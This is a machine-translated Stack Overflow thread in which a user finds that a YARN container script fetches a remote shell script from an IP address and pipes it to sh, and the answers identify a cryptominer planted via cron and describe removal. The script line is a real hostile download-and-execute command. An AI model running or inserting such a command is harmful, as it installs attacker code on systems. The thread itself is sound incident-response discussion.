似乎纱线被木马感染了,即使我重装我的电脑?
似乎纱线被木马感染了,即使我重装我的电脑?
提问于 2018-05-25 10:30:08
每次当我开始我的yarn时,我都会发现一个无法完成的任务请求,但我无法获得关于它的任何日志,也没有发现任何错误。我在临时目录中找到了一个名为launch_container.sh的文件,如下所示:
enter code here#!/bin/bash
export NM_HTTP_PORT="8042"
export LOCAL_DIRS="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001"
export HADOOP_COMMON_HOME="/root/hadoop-2.8.3"
export JAVA_HOME="/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.181-2.6.14.8.el7_5.x86_64/jre"
export NM_AUX_SERVICE_mapreduce_shuffle="AAA0+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
"
export HADOOP_YARN_HOME="/root/hadoop-2.8.3"
export HADOOP_TOKEN_FILE_LOCATION="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001/container_1527211944644_0001_02_000001/container_tokens"
export NM_HOST="VM_0_11_centos"
export APPLICATION_WEB_PROXY_BASE="/proxy/application_1527211944644_0001"
export JVM_PID="$$"
export USER="dr.who"
export HADOOP_HDFS_HOME="/root/hadoop-2.8.3"
export PWD="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001/container_1527211944644_0001_02_000001"
export CONTAINER_ID="container_1527211944644_0001_02_000001"
export HOME="/home/"
export NM_PORT="44381"
export LOGNAME="dr.who"
export APP_SUBMIT_TIME_ENV="1527212057989"
export MAX_APP_ATTEMPTS="2"
export HADOOP_CONF_DIR="/root/hadoop-2.8.3/etc/hadoop"
export MALLOC_ARENA_MAX="4"
export LOG_DIRS="/root/hadoop-2.8.3/logs/userlogs/application_1527211944644_0001/container_1527211944644_0001_02_000001"
exec /bin/bash -c "curl 185.222.210.59/x_wcr.sh | sh"
hadoop_shell_errorcode=$?
if [ $hadoop_shell_errorcode -ne 0 ]
then
exit $hadoop_shell_errorcode
fi我发现它会从网站上下载一些东西,我已经将我的电脑从ubuntu重装到centos,这个问题仍然存在,尽管我在其他电脑上找不到同样的问题。这个问题是一个正常的东西还是木马?请给出一些关于如何解决这个问题的提示,谢谢。和这个网站"http://ist-deacuna-s1.syr.edu:8088/cluster/apps“一样
这种情况是在我关闭wget的端口后产生的,当我打开wget的端口时,它会添加一些jps看不到的会话,只是被命令观察到
ps -ef|grep java
ubuntu 7484 1 97 07:16 ? 00:01:58 /var/tmp/java -c /var/tmp/w.conf
ubuntu 7496 1 96 07:16 ? 00:01:57 /var/tmp/java -c /var/tmp/w.conf这两个会话总是占用我所有的cpu。
回答 2
Stack Overflow用户
发布于 2018-06-06 02:51:56
这是一个黑客..。他们在你的机器上放了个矿工。我也有同样的问题,下面是如何摆脱它。他们创建了一个cron作业来执行一个远程sh文件,以便在您删除它时对其进行“安装”。必须先将其删除。我找到了我的
/var/spool/cron然后,您可以删除整个/var/tmp/目录。那就干掉违规的pids。通过以下方式查找
ps -Af | grep /tmp/我正在试图弄清楚他们是如何访问我们的机器来安装这个的。
Stack Overflow用户
发布于 2018-05-30 16:16:36
您可以使用--version检查/var/tmp/java文件吗?也有同样的问题。建议您将找到XMRig
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://stackoverflow.com/questions/50520658
复制相关文章
相似问题
腾讯云开发者
